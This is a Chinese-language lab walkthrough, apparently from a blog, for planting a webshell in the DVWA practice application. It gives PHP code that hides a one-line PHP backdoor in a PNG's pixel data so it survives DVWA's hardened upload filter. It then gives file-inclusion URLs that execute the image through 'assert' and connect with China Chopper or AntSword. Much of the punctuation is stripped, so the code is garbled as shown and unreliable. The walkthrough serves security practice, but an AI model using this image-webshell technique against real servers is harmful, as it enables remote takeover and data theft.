新建一个php文件代码?php$p array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,0x66, 0x44, 0x50, 0x33);$img imagecreatetruecolor(32, 32);for ($y 0; $y sizeof($p); $y 3) {$r $p[$y];$g $p[$y1];$b $p[$y2];$color imagecolorallocate($img, $r, $g, $b);imagesetpixel($img, round($y / 3), 0, $color);}imagepng($img, ./xh.png);?然后运行这个php就会生成一个xh.png的文件打开这个png文件发现里面有一个一句木马就是成功的在impossible级别的File Upload中上传xh.png发现文件名变成了乱码在中国菜刀或者蚁剑新建连接地址后面添加assert。这里ip地址不同记得修改http://192.168.60.103:808/dvwa-master/vulnerabilities/fi/?page../../hackable/uploads/aeb44874570166ef73346289aee17ce0.png0assert浏览网站然后再修改级别为low点击File Inclusion切记级别是low),然后再地址栏打入http://192.168.60.103:808/dvwa-master/vulnerabilities/fi/?page../../hackable/uploads/aeb44874570166ef73346289aee17ce0.png0assert点击中国菜刀右键点击文件管理就ok了